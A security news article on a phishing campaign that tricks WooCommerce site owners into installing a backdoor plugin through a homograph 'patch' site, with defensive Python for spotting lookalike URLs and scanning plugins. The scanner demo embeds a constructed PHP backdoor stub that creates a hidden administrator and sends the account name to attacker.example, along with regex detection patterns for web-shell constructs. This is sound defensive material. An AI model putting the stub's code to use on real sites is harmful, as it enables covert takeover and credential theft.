
WooCommerce Users Targeted by Sophisticated Phishing Attack


Cybersecurity experts have issued a warning about a large-scale phishing attack targeting WooCommerce users. The attackers are tricking victims with a fake security alert, prompting them to download a “critical patch” that instead installs a backdoor on their websites.

This campaign, described as sophisticated by Patchstack, a WordPress security company, mirrors a similar attack observed in December 2023. In that earlier campaign, attackers used a fake CVE to breach WooCommerce sites. The phishing techniques, malicious web pages, and methods to hide malware are almost identical, suggesting this might be the work of the same threat actor or a new cluster of cybercriminals copying their tactics.

Security researcher Chazz Wolcott explained that the attackers claim the targeted websites have been affected by a non-existent “Unauthenticated Administrative Access” vulnerability. They then lure victims to a fake WooCommerce website using an IDN homograph attack: visually similar Unicode characters such as “ė” stand in for the ASCII “e”, so the lookalike domain is hard to tell from the official WooCommerce site by eye.

How the Attack Works: A Step-by-Step Breakdown

Once a victim receives the phishing email, they are prompted to click a “Download Patch” link. This action takes them to a fraudulent WooCommerce Marketplace page hosted on woocommėrce[.]com. Here, they are encouraged to download a ZIP archive named authbypass-update-31297-id.zip.
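Checking the link before clicking it is the simplest defence against the homograph trick described above. The following is an added example, not code from the article or from Patchstack: it refangs a URL as it might appear in a report, converts the host to its punycode (xn--) form, and compares a diacritic-stripped skeleton of the host against a small allow-list of legitimate hosts. The allow-list, the brand labels and the sample URLs are assumptions made for this example.

```python
import unicodedata
from urllib.parse import urlsplit

# Assumptions for the example: the hosts we trust and the brand labels that lookalikes borrow.
LEGITIMATE_HOSTS = {"woocommerce.com", "wordpress.org"}
BRAND_LABELS = {"woocommerce", "wordpress"}


def refang(text):
    """Undo the usual [.] / hxxp defanging so the URL can be parsed."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def to_ascii(host):
    """IDNA (punycode) form of a host name; pure-ASCII hosts pass through unchanged."""
    return host.encode("idna").decode("ascii")


def skeleton(host):
    """Crude confusable skeleton: decompose, drop combining marks (so 'ė' -> 'e'), casefold.
    This catches diacritic-based homoglyphs only; cross-script confusables (a Cyrillic 'о'
    for a Latin 'o') survive NFKD unchanged and need a real confusables table."""
    decomposed = unicodedata.normalize("NFKD", host)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch)).casefold()


def _under_legitimate(host):
    return host in LEGITIMATE_HOSTS or any(host.endswith("." + legit) for legit in LEGITIMATE_HOSTS)


def classify_host(host):
    """Return (verdict, punycode_host) where verdict is one of
    legitimate / homograph / lookalike / unrelated / invalid."""
    host = host.strip().rstrip(".").casefold()
    try:
        # Round trip through IDNA: canonical Unicode form (also decodes xn-- input) and punycode form.
        unicode_host = host.encode("idna").decode("idna")
        ascii_host = to_ascii(unicode_host)
    except UnicodeError:
        return ("invalid", host)
    if _under_legitimate(ascii_host):
        return ("legitimate", ascii_host)
    if _under_legitimate(skeleton(unicode_host)):
        return ("homograph", ascii_host)          # e.g. woocommėrce.com -> xn--... but skeleton matches
    labels = ascii_host.split(".")
    registrable = labels[-2] if len(labels) >= 2 else ascii_host
    if any(brand in registrable for brand in BRAND_LABELS):
        return ("lookalike", ascii_host)          # e.g. woocommerce-help.com, woocommerce-api.com
    return ("unrelated", ascii_host)


def classify_url(url):
    """Classify the host of a (possibly defanged) URL taken from an e-mail or a report."""
    host = urlsplit(refang(url)).hostname or ""
    return classify_host(host)


if __name__ == "__main__":
    # Constructed sample links, modelled on the hosts named in the write-up.
    for link in ("https://woocommerce.com/products/",
                 "https://woocommėrce[.]com/marketplace/",
                 "hxxps://woocommerce-help[.]com/update",
                 "https://example.org/"):
        print(link, "->", classify_url(link))
```

The official WooCommerce host is pure ASCII, so any xn-- label in a link that claims to come from WooCommerce is a red flag on its own; the skeleton comparison just makes the reason explicit. A mail gateway or browser that shows the punycode form lets a human make the same call.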

The archive contains a WordPress plugin, not a patch. Once it is installed and activated, the malicious plugin carries out the following actions:

  1. Creates a new admin-level user with an obfuscated username and randomized password.
  2. Sets up a cron job that runs every minute.
  3. Sends HTTP GET requests to external servers, transmitting information such as the username, password, and the infected website’s URL.
  4. Downloads a next-stage payload from a second server like woocommerce-help[.]com or woocommerce-api[.]com.
  5. Decodes the payload to extract malicious web shells like P.A.S.-Fork, p0wny, and WSO.
  6. Hides the malicious plugin and the newly created admin account from the WordPress dashboard.

The Impact of the Attack

Once the attackers gain control of the website, they can carry out a range of malicious activities, including:

  • Injecting spam or fraudulent ads onto the website.
  • Redirecting visitors to fake or malicious websites.
  • Enrolling the compromised server into a botnet to execute DDoS attacks.
  • Encrypting server resources as part of an extortion attempt.

How to Protect Your Site from This Phishing Campaign

To protect against this attack, users are advised to:

  • Scan your website for suspicious plugins and newly created admin accounts. Because this plugin hides itself and its user from the dashboard, check the wp-content/plugins directory on disk and the users table directly (for example with WP-CLI or a database query) rather than relying on the Plugins and Users screens.
  • Keep WordPress, WooCommerce and all plugins up to date through the official update mechanism, so that a real security fix never has to arrive as an e-mail attachment or download link.
  • Be cautious of any unexpected e-mail asking you to download or install a patch, especially one that links to a domain other than the official source. WooCommerce and WordPress fixes are delivered through the normal update system, not as ZIP files sent by e-mail.
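One way to carry out the first of these checks is shown below. This is an added example written for this page, not code from the article or from Patchstack: it walks wp-content/plugins on disk, because a plugin that filters itself out of the dashboard listing is still a directory on the file system, and it greps each plugin's PHP for indicators matching the behaviour described above (a 60-second custom cron schedule, granting the administrator role, outbound HTTP to a hard-coded URL, the `all_plugins` filter commonly used to hide a plugin, the `pre_user_query` / `views_users` filters commonly used to hide a user, and eval-of-decoded-payload constructs typical of dropped web shells). The indicator list, the scoring rule, the plugin texts and the hostnames are constructed for the example and are not a signature for the actual campaign sample.

```python
import os
import re
import tempfile

# Heuristic indicators (assumption: a triage shortlist, not a signature for the real sample).
INDICATORS = {
    "eval_decode":     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "hide_plugin":     re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]", re.I),       # removes itself from the Plugins screen
    "hide_user":       re.compile(r"add_(?:filter|action)\s*\(\s*['\"](?:pre_user_query|views_users)['\"]", re.I),
    "grant_admin":     re.compile(r"(?:set_role|add_role)\s*\(\s*['\"]administrator['\"]", re.I),
    "minute_schedule": re.compile(r"['\"]interval['\"]\s*=>\s*60\b"),                      # custom 60-second cron schedule
    "outbound_http":   re.compile(r"(?:wp_remote_get|wp_remote_post|file_get_contents|curl_init)\s*\(\s*['\"]https?://", re.I),
}
HIGH_CONFIDENCE = {"eval_decode", "hide_plugin", "hide_user"}


def scan_php_source(src):
    """Sorted names of the indicators present in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))


def scan_plugins_dir(plugins_dir):
    """Walk wp-content/plugins on disk and return {plugin_slug: [indicator, ...]}
    for every plugin directory with at least one hit."""
    report = {}
    for slug in sorted(os.listdir(plugins_dir)):
        plugin_path = os.path.join(plugins_dir, slug)
        if not os.path.isdir(plugin_path):
            continue
        hits = set()
        for root, _dirs, files in os.walk(plugin_path):
            for name in files:
                if name.endswith(".php"):
                    with open(os.path.join(root, name), encoding="utf-8", errors="replace") as fh:
                        hits.update(scan_php_source(fh.read()))
        if hits:
            report[slug] = sorted(hits)
    return report


def is_suspicious(hits):
    """Flag on any high-confidence indicator, or on two or more weaker ones together."""
    return bool(HIGH_CONFIDENCE & set(hits)) or len(hits) >= 2


# Constructed plugin sources for the demo; neither is real plugin code.
BENIGN_PHP = """<?php
/* Plugin Name: Benign Example (constructed) */
function benign_example_notice() { echo 'Hello from a harmless plugin'; }
add_action('admin_notices', 'benign_example_notice');
"""

# Stand-in for a backdoor plugin mimicking the behaviours listed above; NOT the real sample.
BACKDOOR_PHP = """<?php
/* Plugin Name: Critical Security Patch (constructed stub) */
add_filter('cron_schedules', function ($s) { $s['every_minute'] = ['interval' => 60, 'display' => 'Every Minute']; return $s; });
$uid = wp_create_user('k3y8z', wp_generate_password(), 'x@example.invalid');
(new WP_User($uid))->set_role('administrator');
wp_remote_get('https://attacker.example/collect?u=k3y8z&site=' . home_url());
add_filter('all_plugins', function ($p) { unset($p[plugin_basename(__FILE__)]); return $p; });
"""


def build_demo_tree():
    """Create a throwaway plugins directory holding one benign and one constructed backdoor plugin."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    for slug, src in (("benign-example", BENIGN_PHP), ("authbypass-update", BACKDOOR_PHP)):
        os.makedirs(os.path.join(base, slug))
        with open(os.path.join(base, slug, slug + ".php"), "w", encoding="utf-8") as fh:
            fh.write(src)
    return base


if __name__ == "__main__":
    for slug, hits in scan_plugins_dir(build_demo_tree()).items():
        verdict = "SUSPICIOUS" if is_suspicious(hits) else "review"
        print(f"{slug}: {', '.join(hits)} -> {verdict}")
```

Point `scan_plugins_dir` at the real wp-content/plugins directory to use it; treat hits as a shortlist for manual review, since legitimate plugins also make outbound HTTP calls and register cron schedules. The admin-account half of the advice needs the users table rather than the dashboard, for example `wp user list --role=administrator` or a direct query, because a hidden account may be filtered out of the Users screen.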

This phishing campaign serves as a stark reminder of the need for heightened vigilance and proactive security measures to protect WooCommerce and WordPress sites from growing cyber threats.
